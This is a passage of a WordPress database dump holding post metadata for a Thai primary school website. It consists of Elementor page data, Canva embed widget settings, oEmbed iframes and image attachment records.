(4562,1623,'_edit_lock','1751701481:1'),
(4563,1623,'_oembed_3aa27ffaa845660dd97eb60fd9128b01','<iframe title=\"ให้ทำการสร้างระบบบันทึกข้อมูล “แบบคำขอย้ายนักเรียน ของโรงเรียนบ้านหนองปลาเข็ง-กอไหล่” เป็น Webapp แล...\" src=\"https://www.canva.com/design/DAGsEgLqp9Q/KuP4XiJTXL-MMsLgRbS0gg/view?embed&amp;meta\" height=\"422\" width=\"750\" style=\"border: none; border-radius: 8px; width: 750px; height: 422px;\" allowfullscreen=\"allowfullscreen\" allow=\"fullscreen\"></iframe>'),
(4564,1623,'_oembed_time_3aa27ffaa845660dd97eb60fd9128b01','1751509915'),
(4565,1623,'_edit_last','1'),
(4566,1623,'title_style','hidden'),
(4567,1623,'_title_style','field_5d1a0217cf408'),
(4568,1624,'title_style','default'),
(4569,1624,'_title_style','field_5d1a0217cf408'),
(4571,1623,'_elementor_template_type','wp-page'),
(4572,1623,'_elementor_version','3.29.2'),
(4579,1626,'_elementor_edit_mode','builder'),
(4580,1626,'_elementor_template_type','wp-page'),
(4581,1626,'_elementor_version','3.29.2'),
(4582,1627,'_elementor_edit_mode','builder'),
(4583,1627,'_elementor_template_type','wp-page'),
(4584,1627,'_elementor_version','3.29.2'),
(4585,1623,'_wp_page_template','default'),
(4586,1623,'_elementor_data','[{\"id\":\"ae81da6\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"99a2d57\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/www.canva.com\\/design\\/DAGsEine2O0\\/Q6Wb_uxvDbumPForlKtMkQ\\/view\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"width_tablet\":{\"unit\":\"px\",\"size\":867,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":519,\"sizes\":[]},\"height_mobile\":{\"unit\":\"px\",\"size\":167,\"sizes\":[]},\"align\":\"center\",\"_element_width\":\"initial\",\"_element_custom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4587,1628,'_elementor_edit_mode','builder'),
(4588,1628,'_elementor_template_type','wp-page'),
(4589,1628,'_elementor_version','3.29.2'),
(4590,1628,'_wp_page_template','default'),
(4591,1628,'_elementor_data','[{\"id\":\"ae81da6\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"99a2d57\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/www.canva.com\\/design\\/DAGsEine2O0\\/Q6Wb_uxvDbumPForlKtMkQ\\/view\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"height\":{\"unit\":\"px\",\"size\":519,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4595,1629,'_elementor_edit_mode','builder'),
(4596,1629,'_elementor_template_type','wp-page'),
(4597,1629,'_elementor_version','3.29.2'),
(4598,1629,'_wp_page_template','default'),
(4599,1629,'_elementor_data','[{\"id\":\"ae81da6\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"99a2d57\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/www.canva.com\\/design\\/DAGsEine2O0\\/Q6Wb_uxvDbumPForlKtMkQ\\/view\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"height\":{\"unit\":\"px\",\"size\":519,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4603,1630,'_elementor_edit_mode','builder'),
(4604,1630,'_elementor_template_type','wp-page'),
(4605,1630,'_elementor_version','3.29.2'),
(4606,1630,'_wp_page_template','default'),
(4607,1630,'_elementor_data','[{\"id\":\"ae81da6\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"99a2d57\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/www.canva.com\\/design\\/DAGsEine2O0\\/Q6Wb_uxvDbumPForlKtMkQ\\/view\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"height\":{\"unit\":\"px\",\"size\":519,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4611,1631,'_elementor_edit_mode','builder'),
(4612,1631,'_elementor_template_type','wp-page'),
(4613,1631,'_elementor_version','3.29.2'),
(4614,1631,'_wp_page_template','default'),
(4615,1631,'_elementor_data','[{\"id\":\"ae81da6\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"99a2d57\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/www.canva.com\\/design\\/DAGsEine2O0\\/Q6Wb_uxvDbumPForlKtMkQ\\/view\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":519,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4619,1632,'_elementor_edit_mode','builder'),
(4620,1632,'_elementor_template_type','wp-page'),
(4621,1632,'_elementor_version','3.29.2'),
(4622,1632,'_wp_page_template','default'),
(4623,1632,'_elementor_data','[{\"id\":\"ae81da6\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"99a2d57\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/www.canva.com\\/design\\/DAGsEine2O0\\/Q6Wb_uxvDbumPForlKtMkQ\\/view\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":519,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4625,1633,'_elementor_edit_mode','builder'),
(4626,1633,'_elementor_template_type','wp-page'),
(4627,1633,'_elementor_version','3.29.2'),
(4628,1633,'_wp_page_template','default'),
(4629,1633,'_elementor_data','[{\"id\":\"ae81da6\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"99a2d57\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/www.canva.com\\/design\\/DAGsEine2O0\\/Q6Wb_uxvDbumPForlKtMkQ\\/view\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":519,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4631,1634,'_elementor_edit_mode','builder'),
(4632,1634,'_elementor_template_type','wp-page'),
(4633,1634,'_elementor_version','3.29.2'),
(4634,1634,'_wp_page_template','default'),
(4635,1634,'_elementor_data','[{\"id\":\"ae81da6\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"99a2d57\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/www.canva.com\\/design\\/DAGsEine2O0\\/Q6Wb_uxvDbumPForlKtMkQ\\/view\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"width_tablet\":{\"unit\":\"px\",\"size\":867,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":519,\"sizes\":[]},\"height_mobile\":{\"unit\":\"px\",\"size\":167,\"sizes\":[]},\"align\":\"center\",\"_element_width\":\"initial\",\"_element_custom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4637,1635,'title_style','hidden'),
(4638,1635,'_title_style','field_5d1a0217cf408'),
(4639,1636,'title_style','default'),
(4640,1636,'_title_style','field_5d1a0217cf408'),
(4643,1637,'_edit_lock','1751517671:1'),
(4644,1638,'_wp_attached_file','2025/07/ๆฟ.png'),
(4645,1638,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:300;s:4:\"file\";s:18:\"2025/07/ๆฟ.png\";s:8:\"filesize\";i:88917;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"ๆฟ-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14024;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"ๆฟ-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:104359;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"ๆฟ-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8890;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"ๆฟ-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:66300;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"ๆฟ-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:30959;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4646,1637,'_edit_last','1'),
(4647,1637,'title_style','default'),
(4648,1637,'_title_style','field_5d1a0217cf408'),
(4649,1639,'title_style','default'),
(4650,1639,'_title_style','field_5d1a0217cf408'),
(4651,1637,'_elementor_edit_mode','builder'),
(4652,1637,'_elementor_template_type','wp-page'),
(4653,1637,'_elementor_version','3.29.2'),
(4654,1640,'_elementor_edit_mode','builder'),
(4655,1640,'_elementor_template_type','wp-page'),
(4656,1640,'_elementor_version','3.29.2'),
(4657,1641,'_elementor_edit_mode','builder'),
(4658,1641,'_elementor_template_type','wp-page'),
(4659,1641,'_elementor_version','3.29.2'),
(4660,1637,'_wp_page_template','default'),
(4661,1637,'_elementor_data','[{\"id\":\"47a5e515\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"4552f551\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:image {\\\"id\\\":1638,\\\"sizeSlug\\\":\\\"large\\\",\\\"linkDestination\\\":\\\"none\\\"} -->\\n<figure class=\\\"wp-block-image size-large\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2025\\/07\\/\\u0e46\\u0e1f-1024x256.png\\\" alt=\\\"\\\" class=\\\"wp-image-1638\\\"\\/><\\/figure>\\n<!-- \\/wp:image -->\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e92d516\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"7003bf7\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/www.canva.com\\/design\\/DAGsFHWqrOk\\/eCZISZCLZjZV8cpVDnNIUA\\/view\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":519,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4662,1642,'_elementor_edit_mode','builder'),
(4663,1642,'_elementor_template_type','wp-page'),
(4664,1642,'_elementor_version','3.29.2'),
(4665,1642,'_wp_page_template','default'),
(4666,1642,'_elementor_data','[{\"id\":\"47a5e515\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"4552f551\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:image {\\\"id\\\":1638,\\\"sizeSlug\\\":\\\"large\\\",\\\"linkDestination\\\":\\\"none\\\"} -->\\n<figure class=\\\"wp-block-image size-large\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2025\\/07\\/\\u0e46\\u0e1f-1024x256.png\\\" alt=\\\"\\\" class=\\\"wp-image-1638\\\"\\/><\\/figure>\\n<!-- \\/wp:image -->\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e92d516\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"7003bf7\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/www.canva.com\\/design\\/DAGsFHWqrOk\\/eCZISZCLZjZV8cpVDnNIUA\\/view\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":519,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4668,1643,'_wp_attached_file','2025/07/AQ.png'),
(4669,1643,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:14:\"2025/07/AQ.png\";s:8:\"filesize\";i:10286;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4671,1645,'title_style','hidden'),
(4672,1645,'_title_style','field_5d1a0217cf408'),
(4674,459,'_oembed_d3ba94c8ba151ad531601298d1902d53','<iframe title=\"กระดานถามตอบ โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" src=\"https://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view?embed&amp;meta\" height=\"422\" width=\"750\" style=\"border: none; border-radius: 8px; width: 750px; height: 422px;\" allowfullscreen=\"allowfullscreen\" allow=\"fullscreen\"></iframe>'),
(4675,459,'_oembed_time_d3ba94c8ba151ad531601298d1902d53','1751517884'),
(4676,1647,'title_style','hidden'),
(4677,1647,'_title_style','field_5d1a0217cf408'),
(4678,1648,'title_style','hidden'),
(4679,1648,'_title_style','field_5d1a0217cf408'),
(4681,459,'_elementor_template_type','wp-page'),
(4682,459,'_elementor_version','3.29.2'),
(4683,1649,'_elementor_edit_mode','builder'),
(4684,1649,'_elementor_template_type','wp-page'),
(4685,1649,'_elementor_version','3.29.2'),
(4686,1650,'_elementor_edit_mode','builder'),
(4687,1650,'_elementor_template_type','wp-page'),
(4688,1650,'_elementor_version','3.29.2'),
(4689,459,'_wp_page_template','default'),
(4690,459,'_elementor_data','[{\"id\":\"6bad0515\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"2085205f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:image {\\\"id\\\":1620,\\\"sizeSlug\\\":\\\"large\\\",\\\"linkDestination\\\":\\\"none\\\"} -->\\n<figure class=\\\"wp-block-image size-large\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2025\\/07\\/Is-It-a-Gift-Instagram-Post-1024x256.png\\\" alt=\\\"\\\" class=\\\"wp-image-1620\\\"\\/><\\/figure>\\n<!-- \\/wp:image -->\\n\\n<!-- wp:columns -->\\n<div class=\\\"wp-block-columns\\\"><!-- wp:column -->\\n<div class=\\\"wp-block-column\\\"><!-- wp:image {\\\"lightbox\\\":{\\\"enabled\\\":false},\\\"id\\\":736,\\\"width\\\":\\\"200px\\\",\\\"aspectRatio\\\":\\\"1\\\",\\\"scale\\\":\\\"cover\\\",\\\"sizeSlug\\\":\\\"full\\\",\\\"linkDestination\\\":\\\"custom\\\",\\\"align\\\":\\\"center\\\",\\\"className\\\":\\\"is-style-default\\\"} -->\\n<figure class=\\\"wp-block-image aligncenter size-full is-resized is-style-default\\\"><a href=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/?page_id=1623\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2024\\/08\\/\\u0e22\\u0e49\\u0e32\\u0e22-1.png\\\" alt=\\\"\\\" class=\\\"wp-image-736\\\" style=\\\"aspect-ratio:1;object-fit:cover;width:200px\\\"\\/><\\/a><\\/figure>\\n<!-- \\/wp:image -->\\n\\n<!-- wp:image {\\\"lightbox\\\":{\\\"enabled\\\":false},\\\"id\\\":1608,\\\"width\\\":\\\"200px\\\",\\\"aspectRatio\\\":\\\"1\\\",\\\"scale\\\":\\\"cover\\\",\\\"sizeSlug\\\":\\\"full\\\",\\\"linkDestination\\\":\\\"custom\\\",\\\"align\\\":\\\"center\\\",\\\"className\\\":\\\"is-style-default\\\"} -->\\n<figure class=\\\"wp-block-image aligncenter size-full is-resized is-style-default\\\"><a href=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/?page_id=563\\\"><img src=\\\"http:\\/\\/pakhaeng.ssk.in.th\\/wp-content\\/uploads\\/2025\\/07\\/comment.png\\\" alt=\\\"\\\" class=\\\"wp-image-1608\\\" style=\\\"aspect-ratio:1;object-fit:cover;width:200px\\\"\\/><\\/a><\\/figure>\\n<!-- \\/wp:image --><\\/div>\\n<!-- \\/wp:column -->\\n\\n<!-- 